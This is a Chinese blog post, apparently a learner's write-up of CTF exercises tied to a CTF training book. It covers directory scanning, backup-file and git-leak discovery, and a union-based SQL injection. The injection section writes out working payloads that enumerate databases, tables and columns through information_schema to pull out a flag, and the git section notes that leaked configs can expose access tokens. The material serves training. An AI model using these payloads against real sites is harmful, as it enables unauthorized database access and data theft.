《从0到1:CTFer成长之路》书籍配套题目(不定时更)

常见的搜集

信息搜集大部分是工具的使用(git泄露可能涉及git命令的应用)

书的前半部分我,,,看不懂(只有理论)浅总结一下敏感备份文件,gedit备份文件,vim备份文件
常规文件:在这里插入图片描述

放出提示:
在这里插入图片描述
使用dirbuster工具进行网页目录扫描,⼯具是kali⾃带,
在这里插入图片描述

cd /usr/share/dirbuster
java -jar DirBuster-1.0-RC1.jar

用URL Fuzz,可以指定目录,指定扫描admin目录下面的所有文件,dir代表字典的每一行
在这里插入图片描述
/admin/{dir}.php 这样就是爆破admin目录下所有php文件
或者
在这里插入图片描述
或者是 dirsearch 教程
额,环境也查了,,,没扫出来,尝试自己直接做

/robots.txt

在这里插入图片描述
得到提示,访问可得:flag1:n1book{info_1

/index.php~

在这里插入图片描述
得到提示,访问可得:flag2:s_v3ry_im

.index.php.swp

会得到一个文件
在这里插入图片描述
这题看了wp,软件还是没整明白,过几天再试试。

粗心的小李

在这里插入图片描述
Git测试,使用GitHack脚本对其进行测试,教程!kali有自带的Git、Python2和Python3。转战虚拟机…主要我下半天GitHack,一直失败!
在这里插入图片描述
找到原因了!!!解决不了,四处查找资料发现还有一个工具scrabble可以代替它,教程链接!
在文件夹中打开终端,
在这里插入图片描述
./scrabble +网址
在这里插入图片描述
ls查看
在这里插入图片描述
cat +文件
在这里插入图片描述

1.git回滚:当题目存在git泄露时,flag(敏感)文件可能在修改中被删除或被覆盖了,这时我们可以利用git的“git reset”命令来恢复到以前的版本,更简单的方式是通过“git log-stat”命令查看每个commit修改了哪些文件,再用“git diff HEAD commit-id”比较在当前版本与想查看的commit之间的变化。
2. git分支:每次提交时,git都会自动把它们串成一条时间线,这条时间线就是一个分支,git中默认为master分支。要找的flag或敏感文件可能不会藏在当前分支中。需要切换分支来找到想要的文件。建议工具:GitHacke
3. 泄露的git中也可能有其他有用的信息,如.git/config文件夹中可能含有access_token信息

SQL注入-1

逃不掉的sql题…要总结了一个暑假的sql,要开学了,
先看看书中,是怎么讲的!由于使用的都是get传入所以MySQL中查询和布尔盲注都不再学习。

通过HTTP的GET方式输入的id值,PHP将GET方法传入的id=1与前面的SQL查询语句进行了拼接,

在这里插入图片描述

找注入点

数字型注入,字符型注入

在MySQL中,等号两边如果类型不一致,则会发生强制转换。当数字与字符串数据比较时,字符串将被转换为数字,再进行比较。
按照这个特性,我们容易判断输入点是否为字符型,也就是是否有引号(可能是单引号也可能是双引号,绝大多数情况下是单引号)包裹。

另外:URL编码中空格的编码是“%20”,“#”的编码是“%23”。
?id=1’ and 1=2 页面报错,说明存在注入点
在这里插入图片描述

字段数

id=1' order by 4 --+

在这里插入图片描述利用union select 联合查询

?id=0'union select 1,2,3 --+

在这里插入图片描述
这里使用博客原先使用的快法,在摆一个博客

获取数据库名

id=0' union select 1,2,group_concat(schema_name) from (information_schema.schemata) --++

库名可以一步到位!
在这里插入图片描述
当前数据库名

id=0' union select 1,database(),3 --++

在这里插入图片描述

获取数据表名

id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

在这里插入图片描述

获取数据列名

 id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'--+

在这里插入图片描述

id=0' union select 1,2,group_concat(fllllag) from (fl4g)--+

在这里插入图片描述

[第一章 web入门]SQL注入

首先由题目提示可得,请访问 /login.php /user.php
在这里插入图片描述
试着依次访问这两个文件查看源代码可得提示

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值